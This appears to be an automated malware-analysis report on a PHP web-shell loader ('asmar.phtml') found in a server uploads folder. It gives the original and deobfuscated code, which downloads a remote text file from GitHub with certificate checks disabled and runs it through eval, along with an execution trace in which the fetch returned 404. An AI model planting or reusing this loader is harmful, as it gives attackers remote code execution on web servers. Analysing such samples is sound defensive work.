PHP Malware Analysis
asmar.phtml
md5: 846efc0bec6443a1201730b528174a34
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Execution
- eval (Deobfuscated, Original)
URLs
- https://raw.githubusercontent.com/tuyulmama/root/master/xd.txt (Deobfuscated, Original, Traces)
Deobfuscated PHP code
<?php
function get_contents($url)
{
$ch = curl_init("{$url}");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEJAR, $GLOBALS['coki']);
curl_setopt($ch, CURLOPT_COOKIEFILE, $GLOBALS['coki']);
$result = curl_exec($ch);
return $result;
}
$a = get_contents('https://raw.githubusercontent.com/tuyulmama/root/master/xd.txt');
eval('?>' . $a);Execution traces
data/traces/846efc0bec6443a1201730b528174a34_trace-1676240032.5991.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:14:18.496909]
1 0 1 0.000165 393528
1 3 0 0.000260 398736 {main} 1 /var/www/html/uploads/asmar.phtml 0 0
2 4 0 0.000282 398736 get_contents 1 /var/www/html/uploads/asmar.phtml 15 1 'https://raw.githubusercontent.com/tuyulmama/root/master/xd.txt'
3 5 0 0.000316 398736 curl_init 0 /var/www/html/uploads/asmar.phtml 3 1 'https://raw.githubusercontent.com/tuyulmama/root/master/xd.txt'
3 5 1 0.000349 399680
3 5 R resource(3) of type (curl)
2 A /var/www/html/uploads/asmar.phtml 3 $ch = resource(3) of type (curl)
3 6 0 0.000396 399648 curl_setopt 0 /var/www/html/uploads/asmar.phtml 4 3 resource(3) of type (curl) 19913 1
3 6 1 0.000417 399744
3 6 R TRUE
3 7 0 0.000433 399648 curl_setopt 0 /var/www/html/uploads/asmar.phtml 5 3 resource(3) of type (curl) 52 1
3 7 1 0.000455 399744
3 7 R TRUE
3 8 0 0.000473 399648 curl_setopt 0 /var/www/html/uploads/asmar.phtml 6 3 resource(3) of type (curl) 10018 'Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0'
3 8 1 0.000498 399744
3 8 R TRUE
3 9 0 0.000512 399648 curl_setopt 0 /var/www/html/uploads/asmar.phtml 7 3 resource(3) of type (curl) 64 0
3 9 1 0.000528 399744
3 9 R TRUE
3 10 0 0.000542 399648 curl_setopt 0 /var/www/html/uploads/asmar.phtml 8 3 resource(3) of type (curl) 81 0
3 10 1 0.000558 399744
3 10 R TRUE
3 11 0 0.000611 399624 curl_setopt 0 /var/www/html/uploads/asmar.phtml 9 3 resource(3) of type (curl) 10082 NULL
3 11 1 0.000641 399720
3 11 R TRUE
3 12 0 0.000671 399624 curl_setopt 0 /var/www/html/uploads/asmar.phtml 10 3 resource(3) of type (curl) 10031 NULL
3 12 1 0.000696 399720
3 12 R TRUE
3 13 0 0.000721 399624 curl_exec 0 /var/www/html/uploads/asmar.phtml 11 1 resource(3) of type (curl)
3 13 1 0.038967 399912
3 13 R '404: Not Found'
2 A /var/www/html/uploads/asmar.phtml 11 $result = '404: Not Found'
2 4 1 0.039166 398968
2 4 R '404: Not Found'
1 A /var/www/html/uploads/asmar.phtml 15 $a = '404: Not Found'
2 14 0 0.039223 399504 eval 1 '?>404: Not Found' /var/www/html/uploads/asmar.phtml 16 0
2 14 1 0.039245 399504
1 3 1 0.039256 399096
0.039301 318872
TRACE END [2023-02-12 20:14:18.536079]
Generated HTML code
<html><head></head><body>404: Not Found</body></html>Original PHP code
<?php
function get_contents($url){
$ch = curl_init("$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEJAR,$GLOBALS['coki']);
curl_setopt($ch, CURLOPT_COOKIEFILE,$GLOBALS['coki']);
$result = curl_exec($ch);
return $result;
}
$a = get_contents('https://raw.githubusercontent.com/tuyulmama/root/master/xd.txt');
eval('?>'.$a);